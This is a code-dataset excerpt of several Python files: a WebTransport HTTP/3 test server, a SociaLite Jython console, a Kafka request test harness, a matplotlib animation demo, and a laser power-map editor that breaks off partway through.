source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
webtransport_h3_server.py
|
# mypy: allow-subclassing-any, no-warn-return-any
import asyncio
import logging
import os
import ssl
import threading
import traceback
from urllib.parse import urlparse
from typing import Any, Dict, List, Optional, Tuple
# TODO(bashi): Remove import check suppressions once aioquic dependency is resolved.
from aioquic.buffer import Buffer # type: ignore
from aioquic.asyncio import QuicConnectionProtocol, serve # type: ignore
from aioquic.asyncio.client import connect # type: ignore
from aioquic.h3.connection import H3_ALPN, FrameType, H3Connection, ProtocolError, Setting # type: ignore
from aioquic.h3.events import H3Event, HeadersReceived, WebTransportStreamDataReceived, DatagramReceived, DataReceived # type: ignore
from aioquic.quic.configuration import QuicConfiguration # type: ignore
from aioquic.quic.connection import logger as quic_connection_logger # type: ignore
from aioquic.quic.connection import stream_is_unidirectional
from aioquic.quic.events import QuicEvent, ProtocolNegotiated, ConnectionTerminated, StreamReset # type: ignore
from aioquic.tls import SessionTicket # type: ignore
from tools.wptserve.wptserve import stash # type: ignore
from .capsule import H3Capsule, H3CapsuleDecoder, CapsuleType
"""
A WebTransport over HTTP/3 server for testing.
The server interprets the underlying protocols (WebTransport, HTTP/3 and QUIC)
and passes events to a particular webtransport handler. From the standpoint of
test authors, a webtransport handler is a Python script which contains some
callback functions. See handler.py for available callbacks.
"""
SERVER_NAME = 'webtransport-h3-server'
_logger: logging.Logger = logging.getLogger(__name__)
_doc_root: str = ""
# Set aioquic's log level to WARNING to suppress some INFO logs which are
# recorded every connection close.
quic_connection_logger.setLevel(logging.WARNING)
class H3ConnectionWithDatagram04(H3Connection):
"""
A H3Connection subclass, to make it work with the latest
HTTP Datagram protocol.
"""
H3_DATAGRAM_04 = 0xffd277
# https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-h3-websockets-00#section-5
ENABLE_CONNECT_PROTOCOL = 0x08
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._supports_h3_datagram_04 = False
def _validate_settings(self, settings: Dict[int, int]) -> None:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
if H3_DATAGRAM_04 in settings and settings[H3_DATAGRAM_04] == 1:
settings[Setting.H3_DATAGRAM] = 1
self._supports_h3_datagram_04 = True
return super()._validate_settings(settings)
def _get_local_settings(self) -> Dict[int, int]:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
settings = super()._get_local_settings()
settings[H3_DATAGRAM_04] = 1
settings[H3ConnectionWithDatagram04.ENABLE_CONNECT_PROTOCOL] = 1
return settings
@property
def supports_h3_datagram_04(self) -> bool:
"""
True if the client supports the latest HTTP Datagram protocol.
"""
return self._supports_h3_datagram_04
class WebTransportH3Protocol(QuicConnectionProtocol):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._handler: Optional[Any] = None
self._http: Optional[H3ConnectionWithDatagram04] = None
self._session_stream_id: Optional[int] = None
self._close_info: Optional[Tuple[int, bytes]] = None
self._capsule_decoder_for_session_stream: H3CapsuleDecoder =\
H3CapsuleDecoder()
self._allow_calling_session_closed = True
self._allow_datagrams = False
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, ProtocolNegotiated):
self._http = H3ConnectionWithDatagram04(
self._quic, enable_webtransport=True)
if not self._http.supports_h3_datagram_04:
self._allow_datagrams = True
if self._http is not None:
for http_event in self._http.handle_event(event):
self._h3_event_received(http_event)
if isinstance(event, ConnectionTerminated):
self._call_session_closed(close_info=None, abruptly=True)
if isinstance(event, StreamReset):
if self._handler:
self._handler.stream_reset(event.stream_id, event.error_code)
def _h3_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
# Convert from List[Tuple[bytes, bytes]] to Dict[bytes, bytes].
# Only the last header will be kept when there are duplicate
# headers.
headers = {}
for header, value in event.headers:
headers[header] = value
method = headers.get(b":method")
protocol = headers.get(b":protocol")
if method == b"CONNECT" and protocol == b"webtransport":
self._session_stream_id = event.stream_id
self._handshake_webtransport(event, headers)
else:
self._send_error_response(event.stream_id, 400)
if isinstance(event, DataReceived) and\
self._session_stream_id == event.stream_id:
if self._http and not self._http.supports_h3_datagram_04 and\
len(event.data) > 0:
raise ProtocolError('Unexpected data on the session stream')
self._receive_data_on_session_stream(
event.data, event.stream_ended)
elif self._handler is not None:
if isinstance(event, WebTransportStreamDataReceived):
self._handler.stream_data_received(
stream_id=event.stream_id,
data=event.data,
stream_ended=event.stream_ended)
elif isinstance(event, DatagramReceived):
if self._allow_datagrams:
self._handler.datagram_received(data=event.data)
def _receive_data_on_session_stream(self, data: bytes, fin: bool) -> None:
self._capsule_decoder_for_session_stream.append(data)
if fin:
self._capsule_decoder_for_session_stream.final()
for capsule in self._capsule_decoder_for_session_stream:
if capsule.type in {CapsuleType.DATAGRAM,
CapsuleType.REGISTER_DATAGRAM_CONTEXT,
CapsuleType.CLOSE_DATAGRAM_CONTEXT}:
raise ProtocolError(
f"Unimplemented capsule type: {capsule.type}")
if capsule.type in {CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT,
CapsuleType.CLOSE_WEBTRANSPORT_SESSION}:
# We'll handle this case below.
pass
else:
# We should ignore unknown capsules.
continue
if self._close_info is not None:
raise ProtocolError((
"Receiving a capsule with type = {} after receiving " +
"CLOSE_WEBTRANSPORT_SESSION").format(capsule.type))
if capsule.type == CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT:
buffer = Buffer(data=capsule.data)
format_type = buffer.pull_uint_var()
# https://ietf-wg-webtrans.github.io/draft-ietf-webtrans-http3/draft-ietf-webtrans-http3.html#name-datagram-format-type
WEBTRANPORT_FORMAT_TYPE = 0xff7c00
if format_type != WEBTRANPORT_FORMAT_TYPE:
raise ProtocolError(
"Unexpected datagram format type: {}".format(
format_type))
self._allow_datagrams = True
elif capsule.type == CapsuleType.CLOSE_WEBTRANSPORT_SESSION:
buffer = Buffer(data=capsule.data)
code = buffer.pull_uint32()
# 4 bytes for the uint32.
reason = buffer.pull_bytes(len(capsule.data) - 4)
# TODO(yutakahirano): Make sure `reason` is a UTF-8 text.
self._close_info = (code, reason)
if fin:
self._call_session_closed(self._close_info, abruptly=False)
def _send_error_response(self, stream_id: int, status_code: int) -> None:
assert self._http is not None
headers = [(b"server", SERVER_NAME.encode()),
(b":status", str(status_code).encode())]
self._http.send_headers(stream_id=stream_id,
headers=headers,
end_stream=True)
def _handshake_webtransport(self, event: HeadersReceived,
request_headers: Dict[bytes, bytes]) -> None:
assert self._http is not None
path = request_headers.get(b":path")
if path is None:
# `:path` must be provided.
self._send_error_response(event.stream_id, 400)
return
# Create a handler using `:path`.
try:
self._handler = self._create_event_handler(
session_id=event.stream_id,
path=path,
request_headers=event.headers)
except OSError:
self._send_error_response(event.stream_id, 404)
return
response_headers = [
(b"server", SERVER_NAME.encode()),
(b"sec-webtransport-http3-draft", b"draft02"),
]
self._handler.connect_received(response_headers=response_headers)
status_code = None
for name, value in response_headers:
if name == b":status":
status_code = value
break
if not status_code:
response_headers.append((b":status", b"200"))
self._http.send_headers(stream_id=event.stream_id,
headers=response_headers)
if status_code is None or status_code == b"200":
self._handler.session_established()
def _create_event_handler(self, session_id: int, path: bytes,
request_headers: List[Tuple[bytes, bytes]]) -> Any:
parsed = urlparse(path.decode())
file_path = os.path.join(_doc_root, parsed.path.lstrip("/"))
callbacks = {"__file__": file_path}
with open(file_path) as f:
exec(compile(f.read(), path, "exec"), callbacks)
session = WebTransportSession(self, session_id, request_headers)
return WebTransportEventHandler(session, callbacks)
def _call_session_closed(
self, close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
allow_calling_session_closed = self._allow_calling_session_closed
self._allow_calling_session_closed = False
if self._handler and allow_calling_session_closed:
self._handler.session_closed(close_info, abruptly)
class WebTransportSession:
"""
A WebTransport session.
"""
def __init__(self, protocol: WebTransportH3Protocol, session_id: int,
request_headers: List[Tuple[bytes, bytes]]) -> None:
self.session_id = session_id
self.request_headers = request_headers
self._protocol: WebTransportH3Protocol = protocol
self._http: H3Connection = protocol._http
# Use the a shared default path for all handlers so that different
# WebTransport sessions can access the same store easily.
self._stash_path = '/webtransport/handlers'
self._stash: Optional[stash.Stash] = None
self._dict_for_handlers: Dict[str, Any] = {}
@property
def stash(self) -> stash.Stash:
"""A Stash object for storing cross-session state."""
if self._stash is None:
address, authkey = stash.load_env_config()
self._stash = stash.Stash(self._stash_path, address, authkey)
return self._stash
@property
def dict_for_handlers(self) -> Dict[str, Any]:
"""A dictionary that handlers can attach arbitrary data."""
return self._dict_for_handlers
def stream_is_unidirectional(self, stream_id: int) -> bool:
"""Return True if the stream is unidirectional."""
return stream_is_unidirectional(stream_id)
def close(self, close_info: Optional[Tuple[int, bytes]]) -> None:
"""
Close the session.
:param close_info The close information to send.
"""
self._protocol._allow_calling_session_closed = False
assert self._protocol._session_stream_id is not None
session_stream_id = self._protocol._session_stream_id
if close_info is not None:
code = close_info[0]
reason = close_info[1]
buffer = Buffer(capacity=len(reason) + 4)
buffer.push_uint32(code)
buffer.push_bytes(reason)
capsule =\
H3Capsule(CapsuleType.CLOSE_WEBTRANSPORT_SESSION, buffer.data)
self._http.send_data(session_stream_id, capsule.encode(), end_stream=False)
self._http.send_data(session_stream_id, b'', end_stream=True)
# TODO(yutakahirano): Reset all other streams.
# TODO(yutakahirano): Reject future stream open requests
# We need to wait for the stream data to arrive at the client, and then
# we need to close the connection. At this moment we're relying on the
# client's behavior.
# TODO(yutakahirano): Implement the above.
def create_unidirectional_stream(self) -> int:
"""
Create a unidirectional WebTransport stream and return the stream ID.
"""
return self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=True)
def create_bidirectional_stream(self) -> int:
"""
Create a bidirectional WebTransport stream and return the stream ID.
"""
stream_id = self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=False)
# TODO(bashi): Remove this workaround when aioquic supports receiving
# data on server-initiated bidirectional streams.
stream = self._http._get_or_create_stream(stream_id)
assert stream.frame_type is None
assert stream.session_id is None
stream.frame_type = FrameType.WEBTRANSPORT_STREAM
stream.session_id = self.session_id
return stream_id
def send_stream_data(self,
stream_id: int,
data: bytes,
end_stream: bool = False) -> None:
"""
Send data on the specific stream.
:param stream_id: The stream ID on which to send the data.
:param data: The data to send.
:param end_stream: If set to True, the stream will be closed.
"""
self._http._quic.send_stream_data(stream_id=stream_id,
data=data,
end_stream=end_stream)
def send_datagram(self, data: bytes) -> None:
"""
Send data using a datagram frame.
:param data: The data to send.
"""
if not self._protocol._allow_datagrams:
_logger.warn(
"Sending a datagram while that's now allowed - discarding it")
return
flow_id = self.session_id
if self._http.supports_h3_datagram_04:
# The REGISTER_DATAGRAM_NO_CONTEXT capsule was on the session
# stream, so we must have the ID of the stream.
assert self._protocol._session_stream_id is not None
# TODO(yutakahirano): Make sure if this is the correct logic.
# Chrome always use 0 for the initial stream and the initial flow
# ID, we cannot check the correctness with it.
flow_id = self._protocol._session_stream_id // 4
self._http.send_datagram(flow_id=flow_id, data=data)
def stop_stream(self, stream_id: int, code: int) -> None:
"""
Send a STOP_SENDING frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.stop_stream(stream_id, code)
def reset_stream(self, stream_id: int, code: int) -> None:
"""
Send a RESET_STREAM frame to the given stream.
:param code: the reason of the error.
"""
self._http._quic.reset_stream(stream_id, code)
class WebTransportEventHandler:
def __init__(self, session: WebTransportSession,
callbacks: Dict[str, Any]) -> None:
self._session = session
self._callbacks = callbacks
def _run_callback(self, callback_name: str,
*args: Any, **kwargs: Any) -> None:
if callback_name not in self._callbacks:
return
try:
self._callbacks[callback_name](*args, **kwargs)
except Exception as e:
_logger.warn(str(e))
traceback.print_exc()
def connect_received(self, response_headers: List[Tuple[bytes,
bytes]]) -> None:
self._run_callback("connect_received", self._session.request_headers,
response_headers)
def session_established(self) -> None:
self._run_callback("session_established", self._session)
def stream_data_received(self, stream_id: int, data: bytes,
stream_ended: bool) -> None:
self._run_callback("stream_data_received", self._session, stream_id,
data, stream_ended)
def datagram_received(self, data: bytes) -> None:
self._run_callback("datagram_received", self._session, data)
def session_closed(
self,
close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
self._run_callback(
"session_closed", self._session, close_info, abruptly=abruptly)
def stream_reset(self, stream_id: int, error_code: int) -> None:
self._run_callback(
"stream_reset", self._session, stream_id, error_code)
class SessionTicketStore:
"""
Simple in-memory store for session tickets.
"""
def __init__(self) -> None:
self.tickets: Dict[bytes, SessionTicket] = {}
def add(self, ticket: SessionTicket) -> None:
self.tickets[ticket.ticket] = ticket
def pop(self, label: bytes) -> Optional[SessionTicket]:
return self.tickets.pop(label, None)
class WebTransportH3Server:
"""
A WebTransport over HTTP/3 for testing.
:param host: Host from which to serve.
:param port: Port from which to serve.
:param doc_root: Document root for serving handlers.
:param cert_path: Path to certificate file to use.
:param key_path: Path to key file to use.
:param logger: a Logger object for this server.
"""
def __init__(self, host: str, port: int, doc_root: str, cert_path: str,
key_path: str, logger: Optional[logging.Logger]) -> None:
self.host = host
self.port = port
self.doc_root = doc_root
self.cert_path = cert_path
self.key_path = key_path
self.started = False
global _doc_root
_doc_root = self.doc_root
global _logger
if logger is not None:
_logger = logger
def start(self) -> None:
"""Start the server."""
self.server_thread = threading.Thread(
target=self._start_on_server_thread, daemon=True)
self.server_thread.start()
self.started = True
def _start_on_server_thread(self) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=False,
max_datagram_frame_size=65536,
)
_logger.info("Starting WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
configuration.load_cert_chain(self.cert_path, self.key_path)
ticket_store = SessionTicketStore()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(
serve(
self.host,
self.port,
configuration=configuration,
create_protocol=WebTransportH3Protocol,
session_ticket_fetcher=ticket_store.pop,
session_ticket_handler=ticket_store.add,
))
self.loop.run_forever()
def stop(self) -> None:
"""Stop the server."""
if self.started:
asyncio.run_coroutine_threadsafe(self._stop_on_server_thread(),
self.loop)
self.server_thread.join()
_logger.info("Stopped WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
self.started = False
async def _stop_on_server_thread(self) -> None:
self.loop.stop()
def server_is_running(host: str, port: int, timeout: float) -> bool:
"""
Check the WebTransport over HTTP/3 server is running at the given `host` and
`port`.
"""
loop = asyncio.get_event_loop()
return loop.run_until_complete(_connect_server_with_timeout(host, port, timeout))
async def _connect_server_with_timeout(host: str, port: int, timeout: float) -> bool:
try:
await asyncio.wait_for(_connect_to_server(host, port), timeout=timeout)
except asyncio.TimeoutError:
_logger.warning("Failed to connect WebTransport over HTTP/3 server")
return False
return True
async def _connect_to_server(host: str, port: int) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=True,
verify_mode=ssl.CERT_NONE,
)
async with connect(host, port, configuration=configuration) as protocol:
await protocol.ping()
|
console.py
|
import SociaLite
import sys
from SociaLite import SociaLiteException
from impSocialite import SocialiteImporter
import __builtin__
from code import InteractiveConsole
import org.python.util.PythonInterpreter as PythonInterpInJava
class PythonInterpAdapter(PythonInterpInJava):
def __init__(self, socialite):
import sys
self.socialite = socialite
try:
self.realInterp = sys._jy_interpreter
except:
print "Attribute _jy_interpreter does not exist in sys module"
self.realInterp = None
def getLocals(self):
return self.socialite.locals
def get(self, name):
return self.socialite.locals[name]
def getSystemState(self):
from org.python.core import Py
if not self.realInterp: return Py.getSystemState()
return self.realInterp.getSystemState()
class SociaLiteConsole(InteractiveConsole):
def __init__(self, cpu=None, verbose=False):
InteractiveConsole.__init__(self)
self.filename="<stdin>"
self.inQuery = False # True if the shell is in SociaLite query
self.compiler = None
self.declBegin = None
self.declEnd = None
self.locals={}
from impSocialite import setSocialiteVars
setSocialiteVars(self.locals)
self.locals["__name__"] = "__main__"
self.adapter = PythonInterpAdapter(self)
import socialite.functions.PyInterp as PyInterp
PyInterp.set(self.adapter)
def initLocals(self, _locals=None):
if _locals:
for k,v in _locals.iteritems():
self.locals[k] = v
def asyncImportPyparsing(self):
def importPyparsing():
import time
time.sleep(0.001)
import pyparsing
from threading import Thread
t=Thread(target=importPyparsing)
t.start()
def runsource(self, source, filename="<stdin>", symbol="single"):
if not self.compiler:
from pysoc import compiler
self.compiler = compiler
source = self.compiler.compile(source)
try :
return InteractiveConsole.runsource(self, source, filename, symbol)
except SystemExit, e:
sys.exit(0)
except SociaLiteException, e:
print e.getMessage()
except:
import traceback
try:
tp, value, tb = sys.exc_info()
sys.last_type = tp
sys.last_value = value
sys.last_traceback = tb
tblist = traceback.extract_tb(tb)
del tblist[:1]
list = traceback.format_list(tblist)
if list:
list.insert(0, "Traceback (most recent call last):\n")
list[len(list):] = traceback.format_exception_only(tp, value)
finally:
tblist = tb = None
map(sys.stderr.write, list)
def hasDeclBegin(self, line):
if line.lstrip().find("`") == 0:
return True
return False
def hasDeclEnd(self, line):
l = line.rstrip()
if l.find("`") == len(l)-1:
return True
return False
def __hasDeclBegin(self, line):
if not self.declBegin:
import pyparsing as p
self.declBegin = p.stringStart+p.Literal("`")
self.declBegin.ignore(p.pythonStyleComment)
self.declBegin.ignore(p.quotedString)
if self.declBegin.searchString(line.strip()):
return True
return False
def __hasDeclEnd(self, line):
if not self.declEnd:
import pyparsing as p
self.declEnd = p.Literal("`") + p.stringEnd
self.declEnd.ignore(p.pythonStyleComment)
self.declEnd.ignore(p.quotedString)
if self.declEnd.searchString(line.strip()):
return True
return False
def interact(self, banner=None):
try:
InteractiveConsole.interact(self, banner)
except KeyboardInterrupt:
if self.inQuery:
self.inQuery = False
self.buffer = []
print "Enter quit() or Ctrl-D to exit"
def push(self, line):
if self.inQuery:
if self.hasDeclEnd(line):
self.inQuery= False
more = InteractiveConsole.push(self, line)
return more
elif line.find("`") >= 0:
exc = 'Traceback (most recent call last):\n' + \
' File "<stdin>", line 1, in <module>\n' + \
' Cannot have both Python code and SociaLite query in one line\n'
print exc
self.buffer = []
self.inQuery = False
return False
else:
if line.strip():
self.buffer.append(line)
return True
else:
if self.hasDeclBegin(line) and not self.hasDeclEnd(line):
self.inQuery = True
self.buffer.append(line)
return True
more = InteractiveConsole.push(self, line)
return more
def getBanner():
banner = """
SociaLite 0.8.0-alpha
Type "help" for more information.
Type "quit()" to quit."""
return banner
def interact(verbose=0):
sys.path.insert(0, '')
banner = getBanner()
console = SociaLiteConsole(verbose=verbose)
console.interact(banner)
def run_files(args, verbose=0, inspect=False):
sys.argv = args
filename = args[0]
args = args[1:]
import java.io.File as File
abspath = File(filename).getAbsolutePath()
path = str(abspath[0:abspath.rindex(File.separator)])
sys.path.insert(0, path)
program=open(filename).read()
from pysoc import compiler
src = compiler.compile(program)
from impSocialite import addMod, loadMod, setSocialiteVars
sys.modules.pop("__main__", None)
class FakeConsole:
def __init__(self):
self.locals = None
console = FakeConsole()
adapter = PythonInterpAdapter(console)
import socialite.functions.PyInterp as PyInterp
PyInterp.set(adapter)
mod = addMod("__main__")
setSocialiteVars(mod.__dict__)
console.locals = mod.__dict__
try:
import java.lang.System as Sys
mod = loadMod("__main__", src, filename)
#exec src in locals
except SystemExit:
sys.exit(0)
except:
# adapted from code.py::InteractiveInterpreter::showtraceback
import traceback
try:
tp, value, tb = sys.exc_info()
sys.last_type = tp
sys.last_value = value
sys.last_traceback = tb
tblist = traceback.extract_tb(tb)
del tblist[:1]
list = traceback.format_list(tblist)
if list:
list.insert(0, "Traceback (most recent call last):\n")
list[len(list):] = traceback.format_exception_only(tp, value)
finally:
tblist = tb = None
map(sys.stderr.write, list)
sys.exit(1)
if inspect:
console = SociaLiteConsole(verbose=verbose)
console.initLocals(mod.__dict__)
console.interact("")
def installKeyboardInterruptHandler():
def handler(signum, frame):
print "Enter quit() or Ctrl-D to exit"
import signal
signal.signal(signal.SIGINT, handler)
def show_cluster_status():
SociaLite.status()
def main():
usage ="usage: socialite [options] [script] [script args]"
from optparse import OptionParser
parser=OptionParser(usage)
parser.add_option("-v", "--verbose", action="store_true", dest="v",
help="Run SociaLite script with verbose level=1")
parser.add_option("-c", "--cpu", type="int", default=None, dest="cpu",
help="Set # of cpu to be used")
parser.add_option("-i", action="store_true", dest="inspect",
help="inspect interactively after running script")
parser.add_option("-d", "--dist", action="store_true", dest="dist",
help="Run SociaLite script on a distributed cluster (see conf/ for cluster info). ")
opts, args = parser.parse_args()
interactive = False
if len(args)==0:
interactive = True
if opts.cpu==None: SociaLite.init(dist=opts.dist, interactive=interactive, verbose=opts.v)
else: SociaLite.init(opts.cpu, dist=opts.dist, interactive=interactive, verbose=opts.v)
if opts.dist: show_cluster_status()
import atexit
atexit.register(SociaLite.cleanupOnExit)
sys.meta_path.insert(0, SocialiteImporter())
if interactive:
installKeyboardInterruptHandler()
interact(verbose=opts.v)
else:
run_files(args, verbose=opts.v, inspect = opts.inspect)
if __name__=='__main__':
main()
|
harness.py
|
import random
import signal
import string
import sys
import time
import threading
from datetime import datetime
from kafka.errors import NoBrokersAvailable
from kafka import KafkaProducer
sys.path.insert(1, 'protocols/src/generated/main/python/')
from kafka_topic_pb2 import KafkaTopicRequest
from kafka_user_pb2 import KafkaUserRequest
"""
Run a Kafka producer to send the data to the 'request' ingress topics
Commands:
add-topic: Request to add a Kafka topic
remove-topic: Request to remove a Kafka topic
add-user: Request to remove a Kafka user
remove-user: Request to remove a Kafka user
add-credential: Request to remove a Kafka credential
remove-credential: Request to remove a Kafka credential
"""
KAFKA_ADDR = "localhost:9092"
def produce_add_topic_request(args):
request = KafkaTopicRequest()
request.topic_name = args[0]
request.add_requested.partition_count = 1
request.add_requested.replication_factor = 1
request.add_requested.topic_config["cleanup.policy"] = "delete"
if len(args) > 1:
wait_time = convert_duration(args[1])
if wait_time > 0:
request.add_requested.delete_policy.wait_time = wait_time * 1000
request.add_requested.delete_policy.log_size_policy.lte_size = 1
key = request.topic_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-topic-requests', key, val)
def produce_remove_topic_request(args):
producer = KafkaProducer(bootstrap_servers=[KAFKA_ADDR])
request = KafkaTopicRequest()
request.topic_name = args[0]
request.remove_requested.SetInParent()
key = request.topic_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-topic-requests', key, val)
def produce_add_user_request(args):
request = KafkaUserRequest()
request.user_name = args[0]
request.add_requested.quotas["consumer_byte_rate"] = 2 * 1049600
request.add_requested.quotas["producer_byte_rate"] = 1049600
key = request.user_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-user-requests', key, val)
def produce_remove_user_request(args):
request = KafkaUserRequest()
request.user_name = args[0]
request.remove_requested.SetInParent()
key = request.user_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-user-requests', key, val)
def produce_add_credential_request(args):
identifier = f'{args[0]}.{credential_nonce()}'
secret_text = 'statefun'
expires_in = 60
if len(args) > 1:
expires_in = convert_duration(args[1], expires_in)
request = KafkaUserRequest()
request.user_name = args[0]
request.add_credential_requested.identifier = identifier
request.add_credential_requested.secret_value = secret_text
request.add_credential_requested.expiration_time = (int(datetime.now().timestamp()) + expires_in) * 1000
key = request.user_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-user-requests', key, val)
print(f'Your new SASL credential is username={identifier} password={secret_text} expires-in={int(expires_in)}s')
def produce_revoke_credential_request(args):
identifier = args[0]
(user_name, _nonce) = identifier.split(".", maxsplit=1)
request = KafkaUserRequest()
request.user_name = user_name
request.revoke_credential_requested.identifier = identifier
key = request.user_name.encode('utf-8')
val = request.SerializeToString()
produce_message('kafka-user-requests', key, val)
def credential_nonce():
return "".join([random.choice(string.ascii_uppercase) for n in range(8)])
def convert_duration(val, default_value = 0):
if val == '1m':
return 60
if val == '2m':
return 120
if val == '3m':
return 180
if val == '4m':
return 240
if val == '5m':
return 300
return default_value
def produce_message(topic, key, value):
producer = KafkaProducer(
bootstrap_servers=[KAFKA_ADDR],
security_protocol="SASL_PLAINTEXT",
sasl_mechanism="PLAIN",
sasl_plain_username="statefun",
sasl_plain_password="statefun",
)
producer.send(topic, key=key, value=value)
producer.flush()
def safe_loop(fn, args):
while True:
try:
fn(args)
return
except SystemExit:
print("Good bye!")
return
except NoBrokersAvailable:
time.sleep(2)
continue
except Exception as e:
print(e)
return
def term_handler(number, frame):
sys.exit(0)
def usage(exit_code):
print("harness.py [add-topic|remove-topic|add-user|remove-user|add-credential|revoke-credential] additional_args...")
sys.exit(exit_code)
def main(arg, extra_args):
signal.signal(signal.SIGTERM, term_handler)
if arg == "add-topic":
producer = threading.Thread(target=safe_loop, args=[produce_add_topic_request, extra_args])
producer.start()
producer.join()
if arg == "remove-topic":
producer = threading.Thread(target=safe_loop, args=[produce_remove_topic_request, extra_args])
producer.start()
producer.join()
if arg == "add-user":
producer = threading.Thread(target=safe_loop, args=[produce_add_user_request, extra_args])
producer.start()
producer.join()
if arg == "remove-user":
producer = threading.Thread(target=safe_loop, args=[produce_remove_user_request, extra_args])
producer.start()
producer.join()
if arg == "add-credential":
producer = threading.Thread(target=safe_loop, args=[produce_add_credential_request, extra_args])
producer.start()
producer.join()
if arg == "revoke-credential":
producer = threading.Thread(target=safe_loop, args=[produce_revoke_credential_request, extra_args])
producer.start()
producer.join()
if __name__ == "__main__":
args = sys.argv[1:]
if len(args) < 2:
usage(0)
if args[0] not in ["add-topic", "remove-topic", "add-user", "remove-user", "add-credential", "revoke-credential"]:
usage(1)
main(args[0], args[1:])
|
matplotlib_testing.py
|
import numpy as np
import matplotlib
from matplotlib.patches import Circle, Wedge, Polygon
from matplotlib.collections import PatchCollection
import matplotlib.pyplot as plt
from SDAWithVectorField import *
from MovingObstacleSimulator import *
import matplotlib.patches as patches
from datetime import datetime
import sched, time
import random
import mpl_toolkits.mplot3d.axes3d as p3
import matplotlib.animation as animation
import multiprocessing
# fig = plt.figure()
# ax = p3.Axes3D(fig)
# # create the parametric curve
# t=np.arange(0, 2*np.pi, 2*np.pi/100)
# x=np.cos(t)
# y=np.sin(t)
# z=t/(2.*np.pi)
# # create the first plot
# point, = ax.plot([x[0]], [y[0]], [z[0]], 'o')
# line, = ax.plot(x, y, z, label='parametric curve')
# ax.legend()
# ax.set_xlim([-1.5, 1.5])
# ax.set_ylim([-1.5, 1.5])
# ax.set_zlim([-1.5, 1.5])
# # second option - move the point position at every frame
# def update_point(n, x, y, z, point):
# point.set_data(np.array([x[n], y[n]]))
# point.set_3d_properties(z[n], 'z')
# return point
# ani=animation.FuncAnimation(fig, update_point, 99, fargs=(x, y, z, point))
# plt.show()
fig = plt.figure()
ax1 = fig.add_subplot(1,1,1)
my_manager = multiprocessing.Manager()
x = my_manager.list()
y = my_manager.list()
def makeUpdates(x, y):
index = 0
while True:
x.append(index**2)
y.append(index)
index += 1
time.sleep(1)
def animate(i, x, y):
print(x)
print(y)
ax1.clear()
ax1.plot(x,y)
multiprocessing.Process(target=makeUpdates, args=(x, y,)).start()
ani = animation.FuncAnimation(fig, animate, fargs=(x, y,), interval=1000)
plt.show()
|
power_map_editor.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from __future__ import absolute_import
from pychron.core.ui import set_qt
set_qt()
# ============= enthought library imports =======================
from traits.api import HasTraits, Instance, Float, Int, Bool, DelegatesTo, Range
from traitsui.api import View, Item, UItem, VGroup, HGroup, spring
# from pychron.envisage.tasks.base_editor import BaseTraitsEditor
# from pychron.loggable import Loggable
# from pychron.canvas.canvas2D.raster_canvas import RasterCanvas
from enable.component_editor import ComponentEditor
from pychron.lasers.power.power_mapper import PowerMapper
from pychron.core.ui.thread import Thread
from pychron.lasers.power.power_map_processor import PowerMapProcessor
from pychron.managers.data_managers.h5_data_manager import H5DataManager
# from pychron.graph.graph import Graph
# from pychron.graph.contour_graph import ContourGraph
# from chaco.plot_containers import HPlotContainer
from pychron.lasers.tasks.editors.laser_editor import LaserEditor
# ============= standard library imports ========================
# ============= local library imports ==========================
class PowerMapControls(HasTraits):
beam_diameter = Float(1)
request_power = Float(1)
padding = Float(1.0)
step_length = Float(0.25)
center_x = Float(0)
center_y = Float(0)
integration = Int(1)
discrete_scan = Bool(False)
def traits_view(self):
v = View(
VGroup(
Item("discrete_scan"),
Item("beam_diameter"),
Item("request_power"),
Item("padding"),
Item("step_length"),
Item("center_x"),
Item("center_y"),
)
)
return v
class PowerMapEditor(LaserEditor):
percent_threshold = Range(0.0, 100.0)
beam_diameter = Float
power = Float
# canvas = Instance(RasterCanvas, ())
editor = Instance(PowerMapControls, ())
mapper = Instance(PowerMapper, ())
completed = DelegatesTo("mapper")
# was_executed = False
processor = Instance(PowerMapProcessor)
def _percent_threshold_changed(self, new):
if self.processor:
self.processor.set_percent_threshold(new)
def load(self, path):
pmp = PowerMapProcessor()
reader = H5DataManager()
reader.open_data(path)
cg = pmp.load_graph(reader)
self.beam_diameter, self.power = pmp.extract_attrs(["beam_diameter", "power"])
self.component = cg.plotcontainer
self.was_executed = True
self.processor = pmp
def _do_execute(self):
mapper = self.mapper
mapper.laser_manager = self._laser_manager
editor = self.editor
padding = editor.padding
# if editor.discrete_scan:
# mapper.canvas = self.canvas
# self.component = self.canvas
# else:
c = mapper.make_component(padding)
self.component = c
bd = editor.beam_diameter
rp = editor.request_power
cx = editor.center_x
cy = editor.center_y
